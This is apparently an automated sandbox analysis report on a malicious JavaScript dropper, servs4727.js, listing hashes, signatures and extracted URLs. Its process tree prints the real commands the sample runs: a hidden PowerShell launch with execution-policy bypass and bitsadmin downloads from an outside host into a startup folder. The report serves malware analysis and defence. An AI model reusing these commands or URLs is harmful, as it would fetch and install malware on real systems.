Overview

overview

10

Static

static

1

servs4727.js

windows7-x64

10

servs4727.js

windows10-2004-x64

10

Analysis

  • max time kernel
    50s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    08-07-2023 08:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    servs4727.js

  • Size

    46KB

  • MD5

    ed3dcf3f046e8d3c60d1e1049d0125d2

  • SHA1

    54d5d9832d22f82aec1d987bd6baef1a6096c3a2

  • SHA256

    c69642d092f9320dbc90d38fbecc3f212e4211d4f1e98e69f253d034ec77f960

  • SHA512

    0f8a71d5b8cfbe6b492044ae022986c25b1b68b1f0ffa7497ca7ac65d776bcd8585a0c4429a7674d6ffef4b012ba7e08f90c03a68fc48cdbee02d92835d5896a

  • SSDEEP

    768:8ojU+iaCF7PKzVilJ7Y6+mw1NkPC8gb4Wf8jiVmXhJildEBOAExLsDvXon:LU+L+PKzslJ86+HNyC8S4Wf8jiVmRJSX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ecotree.co.in/images/cora.zip
exe.dropper

https://ecotree.co.in/images/files/cora.zip

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin 1 TTPs 3 IoCs
    dropper
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\servs4727.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\bxb8i4t.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://ecotree.co.in/images/files/cora.zipAudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
        3⤵
        • Download via BitsAdmin
        PID:2084
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://ecotree.co.in/images/files/cora.zipclient32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
        3⤵
        • Download via BitsAdmin
        PID:2236
      • C:\Windows\system32\bitsadmin.exe
        "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://ecotree.co.in/images/files/cora.zipclient32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
        3⤵
        • Download via BitsAdmin
        PID:2104

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\bxb8i4t.ps1
    Filesize

    1KB

    MD5

    fcf369edc7cf78b5d2da1a42511ea775

    SHA1

    4c7036f6cfe0c1b1b565b736e881999a2f84d007

    SHA256

    5093793f67784bd6f043317626b2adc7c21806a3464d58f928757673608e867d

    SHA512

    a58db5b48504b5c1ae01bc61dbc77c48d70b3f14c5f02c23ac129ac16fa281ec8294424cd93f8bf43342baeddde8f5ddaadbefdd95420e9be3db1b023a66104f

    Download Submit

  • memory/2200-60-0x000000001B240000-0x000000001B522000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2200-61-0x00000000023F0000-0x00000000023F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2200-62-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-63-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-65-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-66-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-67-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-68-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2200-69-0x0000000002590000-0x0000000002610000-memory.dmp

    Filesize

    512KB

    Download